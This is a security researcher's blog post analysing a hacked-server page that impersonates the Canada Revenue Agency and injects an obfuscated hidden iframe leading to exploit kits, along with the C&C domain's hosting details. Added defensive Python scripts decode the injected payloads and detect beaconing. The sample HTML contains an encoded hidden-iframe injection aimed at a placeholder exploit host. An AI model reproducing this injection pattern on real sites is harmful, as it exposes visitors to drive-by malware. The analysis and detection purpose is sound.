An ant-hill full of bots


I found a malicious page placed on a hacked server:

CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:

The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:

But what is the rest of the obfuscated code?

Here is the deobfuscated version (courtesy of Wepawet):

Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
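As an added example (not code from the original post), here is a small Python triage script that does statically what Wepawet did for this page: it pulls the delay and target out of a meta refresh tag, decodes document.write(unescape(...)) and document.write(String.fromCharCode(...)) payloads without executing any JavaScript, and reports the iframes that are sized or styled to be invisible. The HTML is a constructed stand-in for cra.html; cra.example and exploit.example.invalid are placeholder hosts, not the domains from the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample page for this example (NOT the real cra.html from the post).
# Hosts are placeholders: cra.example stands in for the legitimate CRA site and
# exploit.example.invalid for the exploit-kit landing page.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="5; URL=https://cra.example/">
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//exploit.example.invalid/in.cgi%3F3%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,101,120,112,108,111,105,116,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,103,111,46,112,104,112,34,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62));</script>
</head><body>Please wait...</body></html>"""

META_REFRESH_RE = re.compile(
    r'<meta\s+[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)
# Two obfuscation idioms seen in injected landing pages: unescape('%XX...') and
# String.fromCharCode(n, n, ...), both fed straight into document.write.
WRITE_RE = re.compile(
    r"document\.write\(\s*(?:"
    r"unescape\(\s*['\"](?P<esc>[^'\"]*)['\"]\s*\)"
    r"|String\.fromCharCode\(\s*(?P<codes>[\d\s,]+)\))\s*\)",
    re.IGNORECASE,
)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))""")


def parse_meta_refresh(page):
    """Return (delay_seconds, target_url) from <meta http-equiv=refresh>, or None."""
    m = META_REFRESH_RE.search(page)
    if not m:
        return None
    delay, _, rest = m.group(1).partition(";")
    rest = rest.strip()
    if rest.lower().startswith("url="):  # "url=" is optional and case-insensitive
        rest = rest[4:].strip()
    return int(delay.strip()), rest


def js_unescape(s):
    """Decode what JavaScript's unescape() accepts: %XX and %uXXXX sequences."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def js_from_char_code(args):
    """Decode the argument list of String.fromCharCode(...)."""
    return "".join(chr(int(x)) for x in args.split(",") if x.strip())


def decode_document_writes(page):
    """Statically recover the HTML each document.write(...) would have emitted."""
    out = []
    for m in WRITE_RE.finditer(page):
        if m.group("esc") is not None:
            out.append(js_unescape(m.group("esc")))
        else:
            out.append(js_from_char_code(m.group("codes")))
    return out


def find_hidden_iframes(fragment):
    """Return src URLs of iframes that are 0/1 pixel in size or styled invisible."""
    found = []
    for m in IFRAME_RE.finditer(fragment):
        attrs = {}
        for a in ATTR_RE.finditer(m.group(1)):
            attrs[a.group(1).lower()] = a.group(2) or a.group(3) or a.group(4) or ""
        tiny = attrs.get("width", "") in ("0", "1") or attrs.get("height", "") in ("0", "1")
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if (tiny or hidden) and attrs.get("src"):
            found.append(attrs["src"])
    return found


def triage(page):
    """Summarise the visible redirect and the concealed iframe targets of a page."""
    refresh = parse_meta_refresh(page)
    decoded = decode_document_writes(page)
    iframes = [u for chunk in decoded for u in find_hidden_iframes(chunk)]
    return {
        "refresh_delay": refresh[0] if refresh else None,
        "refresh_url": refresh[1] if refresh else None,
        "decoded_writes": decoded,
        "hidden_iframe_urls": iframes,
        "hidden_iframe_hosts": sorted({urlparse(u).hostname for u in iframes}),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_HTML).items():
        print(f"{k}: {v}")
```

The meta refresh is the decoy the victim sees; the decoded document.write output is where the real target lives, which is why the two are reported separately. Real landing pages layer more tricks (string splitting, eval chains, key-based decoding) that a regex pass will not unwind, so treat a run with an empty decoded_writes list as "inconclusive", not "clean".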

I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):

This is a pretty cool feature that can prevent many infections. Thanks Google :-)

Following a successful installation, the malware calls home at regular intervals and sends data in what looks like a custom obfuscated form:
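As an added example, not part of the original post: a callback at regular intervals is the kind of beaconing that stands out in proxy logs even when the payload itself is obfuscated. The script below groups requests by (client, destination host) and flags pairs whose inter-request gaps have very little relative spread. The log lines are constructed for this example; cnc.example.invalid is a placeholder host, and the 60-second period and the thresholds are assumptions, not values from the post.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log for this example (not traffic from the post).
# Format: <ISO timestamp> <client IP> <destination host> <method> <path>
# cnc.example.invalid is a placeholder C&C host; the other hosts are benign filler.
SAMPLE_LOG = """\
2000-01-01T10:00:00 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:00:12 10.0.0.5 news.example GET /
2000-01-01T10:00:13 10.0.0.5 cdn.example GET /site.css
2000-01-01T10:00:14 10.0.0.5 cdn.example GET /app.js
2000-01-01T10:00:15 10.0.0.5 news.example GET /story/1
2000-01-01T10:01:00 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:02:00 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:03:01 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:03:59 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:04:40 10.0.0.5 news.example GET /story/2
2000-01-01T10:05:00 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:06:00 10.0.0.5 cnc.example.invalid POST /gate.php
2000-01-01T10:06:05 10.0.0.5 news.example GET /story/3
2000-01-01T10:06:06 10.0.0.5 news.example GET /img/3.png
2000-01-01T10:07:00 10.0.0.5 cnc.example.invalid POST /gate.php
"""


def parse_log(text):
    """Parse the five-column log format above into (timestamp, client, host, method, path)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path = line.split(None, 4)
        records.append((datetime.fromisoformat(ts), client, host, method, path))
    return records


def find_beacons(records, min_requests=5, max_cv=0.15):
    """Flag (client, host) pairs whose request timing looks like a timer, not a human.

    A beacon with a fixed sleep has a low coefficient of variation (stdev/mean)
    across its inter-request gaps; browsing produces bursts and long idle gaps.
    min_requests avoids judging a pair on one or two intervals.
    """
    by_pair = defaultdict(list)
    for ts, client, host, _, _ in records:
        by_pair[(client, host)].append(ts)

    hits = []
    for (client, host), times in by_pair.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({
                "client": client,
                "host": host,
                "requests": len(times),
                "mean_gap_s": round(mean, 1),
                "cv": round(cv, 3),
            })
    return sorted(hits, key=lambda h: h["cv"])


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{hit['client']} -> {hit['host']}: {hit['requests']} requests, "
              f"every ~{hit['mean_gap_s']}s (cv={hit['cv']})")
```

The few seconds of drift around the 60-second period (10:03:01, 10:03:59) is deliberate in the sample: real implants jitter, so thresholds should tolerate it. Well-behaved software also beacons (update checks, mail polling), so a hit is a lead for a domain lookup like the one that follows, not a verdict on its own.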

Let’s check out the malicious domain:

Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.

Registrant information is bogus (of course):
Ricardo GALENO
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741

Other domain names on that server include:

This ASN is deeply involved in allowing CnC servers and other bot-related activity:

Google Safe Browsing

At this moment, I am not sure what the connection (if any) between the malware and the Canada Revenue Agency is.

Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.

Jerome Segura
